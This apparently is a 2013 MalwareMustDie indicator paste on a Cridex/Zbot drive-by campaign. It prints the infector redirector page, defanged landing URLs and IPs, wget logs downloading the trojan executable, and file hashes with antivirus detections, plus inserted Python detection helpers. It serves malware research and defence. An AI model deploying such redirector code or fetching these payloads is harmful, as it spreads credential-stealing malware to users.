#MalwareMustDie! On duty: @unixfreaxjp ~]$ date
Thu Mar 14 02:28:24 JST 2013
Credit: thanks to @hugbomb and @nyxbone
// Case: http://malwaremustdie.blogspot.jp/2013/02/bhek-cridex-combo-with-ransomware.html
// Case: http://malwaremustdie.blogspot.com/2013/03/ru8080columnphp-hey-stealer-what-do-you.html
// Rgx: http://goo.gl/KvD2q
#Cridex domains today:
// infector pattern (redirector pages):
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
</head>
<body>
<h2><b>Please wait a moment ... You will be forwarded.</h2></b>
<h5>Internet Explorer and Mozilla Firefox compatible only</h5><br>
<script>
var1=49;
var2=var1;
if(var1==var2) {document.location="h00p://giimiiifo・ru:8080/forum/links/column・php";}
</script>
</body>
</html>
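Added example, not from the paste and not MalwareMustDie's code: two small Python helpers a defender could use to flag the redirector pattern above in a fetched page and to pull the landing hosts out of wget transcripts or proxy log lines. The regex is my own construction (not the author's goo.gl regex) and the hostnames in the samples are constructed placeholders.

```python
import re

# Landing URL pattern from the redirector/logs above: port 8080, /forum/links/column.php,
# gf= and xe= query parameters. Hypothetical regex, not the author's.
LANDING_URL_RE = re.compile(
    r"https?://(?P<host>[a-z0-9.-]+):8080/forum/links/column\.php\?[^\s\"']*",
    re.IGNORECASE,
)
# Redirector page pattern: a script that assigns document.location to that URL.
REDIRECT_RE = re.compile(r"document\.location\s*=\s*[\"'](?P<url>[^\"']+)[\"']", re.IGNORECASE)

def _is_landing(url):
    """True when url matches the full landing pattern including both parameters."""
    return LANDING_URL_RE.fullmatch(url) is not None and "gf=" in url and "xe=" in url

def redirect_target(html):
    """Return the landing URL a redirector page forwards to, or None when the page
    has no document.location assignment or its target is not the landing pattern."""
    for m in REDIRECT_RE.finditer(html):
        if _is_landing(m.group("url")):
            return m.group("url")
    return None

def landing_hosts(log_lines):
    """Distinct hosts (first-seen order) fetched for the landing URL in wget
    transcripts or proxy logs; hits missing gf= or xe= are ignored."""
    seen = []
    for line in log_lines:
        for m in LANDING_URL_RE.finditer(line):
            host = m.group("host").lower()
            if _is_landing(m.group(0)) and host not in seen:
                seen.append(host)
    return seen

# Constructed samples; the hostnames are placeholders, not real indicators.
SAMPLE_HTML = """<html><body><h2><b>Please wait a moment ...</h2></b>
<script>var1=49; var2=var1;
if(var1==var2) {document.location="http://redir-a.invalid:8080/forum/links/column.php?gf=2w:1l:1l&xe=2v:1k&r=1k";}
</script></body></html>"""
BENIGN_HTML = '<script>document.location="https://www.example.com/login";</script>'
SAMPLE_LOG = [
    "--2013-03-14 02:17:05-- http://redir-a.invalid:8080/forum/links/column.php?gf=2w:1l:1l&xe=2v:1k&r=1k",
    "1363194000.123 GET http://redir-b.invalid:8080/forum/links/column.php?gf=2w:1l&xe=2v:1k 200",
    "1363194001.456 GET http://redir-a.invalid:8080/forum/links/column.php?gf=2w:1l&xe=2v:1k 200",
    "1363194002.789 GET http://benign.invalid:8080/forum/links/index.php 200",
]
```

Run it as `redirect_target(SAMPLE_HTML)` and `landing_hosts(SAMPLE_LOG)`; the benign page and the index.php line produce no hits.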
//domains:PORT (all)
//IP:
94・102・14・239,
213・215・240・24,
93・174・138・48
//payload url:
//payload download snapshot:
//some of the download logs as PoC (text):
--2013-03-14 02:17:05-- h00p://gimiiiank・ru:8080/forum/links/column・php?gf=2w:1l:1l:2v:1f&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&r=1k&hy=e&gy=m
Resolving gimiiiank・ru... 94・102・14・239, 213・215・240・24, 93・174・138・48
Connecting to gimiiiank・ru|94・102・14・239|:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 175104 (171K) [application/x-msdownload]
Saving to: `sample1.exe'
2013-03-14 02:17:09 (63.6 KB/s) - `sample1.exe' saved [175104/175104]
--2013-03-14 02:17:36-- h00p://giminaaaao・ru:8080/forum/links/column・php?gf=2w:1l:1l:2v:1f&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&r=1k&hy=e&gy=m
Resolving giminaaaao・ru... 94・102・14・239, 213・215・240・24, 93・174・138・48
Connecting to giminaaaao・ru|94・102・14・239|:8080... connected.
Saving to: `sample2.exe'
2013-03-14 02:17:40 (62.8 KB/s) - `sample2.exe' saved [175104/175104]
--2013-03-14 02:18:07-- h00p://giimiiifo・ru:8080/forum/links/column・php?gf=2w:1l:1l:2v:1f&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&r=1k&hy=e&gy=m
Resolving giimiiifo・ru... 94・102・14・239, 213・215・240・24, 93・174・138・48
Connecting to giimiiifo・ru|94・102・14・239|:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 175104 (171K) [application/x-msdownload]
Saving to: `sample3.exe'
2013-03-14 02:18:12 (65.0 KB/s) - `sample3.exe' saved [175104/175104]
// same sample PoC:
$ md5 sample*
[Path] / filename MD5 sum
-------------------------------------------------------------------------------
[C:\Program Files\GnuWin32-new\bin\]
sample1.exe f0063edef419009b1564e5fba81157db
sample2.exe f0063edef419009b1564e5fba81157db
sample3.exe f0063edef419009b1564e5fba81157db
VirusTotal : https://www.virustotal.com/en/file/028b2eccba3d7e0792e4fcab685c4003c7bb297773f5b14b3cfe55c62a41304a/analysis/
SHA256: 028b2eccba3d7e0792e4fcab685c4003c7bb297773f5b14b3cfe55c62a41304a
SHA1: fb570e861a9388327a77635ca0568d4b73342296
MD5: f0063edef419009b1564e5fba81157db
File size: 171.0 KB ( 175104 bytes )
File name: contacts.exe / info.exe / calc.exe
File type: Win32 EXE
Tags: peexe
Detection ratio: 3 / 44
Analysis date: 2013-03-13 15:40:26 UTC ( 1 hour, 52 minutes ago )
Malwarebytes : Trojan.Zbot
AhnLab-V3 : Spyware/Win32.Zbot
Kaspersky : HEUR:Trojan.Win32.Generic
---
#MalwareMustDie!!